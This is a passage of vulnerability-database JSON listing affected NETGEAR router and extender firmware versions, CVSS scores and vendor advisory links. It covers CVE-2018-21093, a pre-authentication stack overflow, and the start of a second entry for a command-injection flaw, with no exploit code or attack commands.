"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "094113E0-3656-4E2A-B9EF-D397296BD07C",
"versionEndExcluding": "1.0.2.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "46452E97-9347-4788-9570-1EECECC7255E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300-2cxnas_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3AD07C88-27DC-4622-801E-161C131F5A30",
"versionEndExcluding": "1.0.3.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300-2cxnas:-:*:*:*:*:*:*:*",
"matchCriteriaId": "86D8D8B5-E243-4339-AF83-66F8E276AA2F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "502055F1-F919-4C91-A3D0-B144027BC690",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB86B739-440E-4269-92EC-F7F3058E4406",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E821B01-31C8-4766-BAAF-D814336617B9",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "577AD463-2E99-4D07-BF12-1D40AC88B3FC",
"versionEndExcluding": "1.0.9.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90805FFE-E59D-43D2-BF1E-D55458CF05BF",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52A6DEB2-3A33-4184-866D-9C8D9DD991C6",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E59E66D2-7E73-45C8-8D3E-FE589CDBECA4",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "586740D8-2423-404C-B5E2-23B273945CCD",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "29B13F94-F151-4F00-95C3-D9FB22B3CC2B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C9AB4A-497B-4D5C-93E3-430C3361E24F",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C5FC237-F74C-4771-B5D3-36CF245C0396",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbw30_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E993AF26-3505-4FD8-8842-F5E613CDDC2E",
"versionEndExcluding": "2.1.2.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbw30:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FEA73D22-970D-45F2-81F3-9576C04CCC94",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FD6B70-DE32-4629-B99B-39F0515C0207",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0960178A-5EC8-4C53-8AA2-060025782DC0",
"versionEndExcluding": "1.2.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D8500 before 1.0.3.42, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300-2CXNAS before 1.0.3.60, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300 before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.18, R8000P before 1.3.0.10, R7900P before 1.3.0.10, R8500 before 1.0.2.122, R8300 before 1.0.2.122, RBW30 before 2.1.2.6, WN2500RPv2 before 1.0.0.54, and WNR3500Lv2 before 1.2.0.56."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un atacante no autenticado. Esto afecta a D8500 versiones anteriores a 1.0.3.42, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0.70, EX6000 versiones anteriores a 1.0.0.30, EX6100 versiones anteriores a 1.0.2.24, EX6120 versiones anteriores a 1.0.0.40, EX6130 versiones anteriores a 1.0.0.22, EX6150 versiones anteriores a 1. 0.0.42, EX6200 versiones anteriores a 1.0.3.88, EX7000 versiones anteriores a 1.0.0.66, R6250 versiones anteriores a 1.0.4.26, R6300-2CXNAS versiones anteriores a 1.0.3.60, R6300v2 versiones anteriores a 1.0.4.28, R6400 versiones anteriores a 1.0.1.36, R6400v2 versiones anteriores a 1.0.2. 52, R6700 versiones anteriores a 1.0.1.46, R6900 versiones anteriores a 1.0.1.46, R7000 versiones anteriores a 1.0.9.28, R7000P versiones anteriores a 1.3.1.44, R6900P versiones anteriores a 1.3.1.44, R7100LG versiones anteriores a 1.0.0.46, R7300 versiones anteriores a 1.0.0.68, R7900 versiones anteriores a 1.0.2. 10, R8000 versiones anteriores a 1.0.4.18, R8000P versiones anteriores a 1.3.0.10, R7900P versiones anteriores a 1.3.0.10, R8500 versiones anteriores a 1.0.2.122, R8300 versiones anteriores a 1.0.2.122, RBW30 versiones anteriores a 2.1.2.6, WN2500RPv2 versiones anteriores a 1.0.0.54, y WNR3500Lv2 versiones anteriores a 1.2.0.56."
}
],
"id": "CVE-2018-21093",
"lastModified": "2024-11-21T04:02:53.023",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.0"
},
"exploitabilityScore": 0.9,
"impactScore": 5.5,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-27T15:15:12.080",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060456/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Wireless-Extenders-and-Orbi-Satellites-PSV-2017-2011"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060456/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Wireless-Extenders-and-Orbi-Satellites-PSV-2017-2011"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-22 14:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6150v2 before 1.0.1.54, EX6100v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.18, R6900P before 1.3.0.8, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R8000 before 1.0.4.4_1.1.42, R7900P before 1.1.5.14, R8000P before 1.1.5.14, R8300 before 1.0.2.110, R8500 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.14, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.40, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "47FB5F9D-2B33-44AD-BD57-164DF945ADA7",
"versionEndExcluding": "1.0.0.67",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2089DF5E-598C-4CC2-B910-05C8D209A1BB",
"versionEndExcluding": "1.0.0.67",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A756C-6CA4-46EF-80B8-9051FB607B43",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BA902AA9-525D-46BD-B586-1A0DC40EE391",
"versionEndExcluding": "1.1.00.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1FD6552E-5BF6-4E57-90A7-39C4543B469C",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CE087F75-4C99-425C-A9B7-B261E5545297",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "327F762B-1F65-4DE0-B05C-1AAC64974A14",
"versionEndExcluding": "1.0.1.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "34A8EAED-389E-4B14-949E-ED87A09F4D91",
"versionEndExcluding": "1.0.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0173E81F-5BE3-4249-A620-EC36AD109D75",
"versionEndExcluding": "1.0.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9398174B-A4A6-449A-AB91-A93D3D9398DD",
"versionEndExcluding": "1.0.3.35",
"vulnerable": true
}
],
"negate": false,
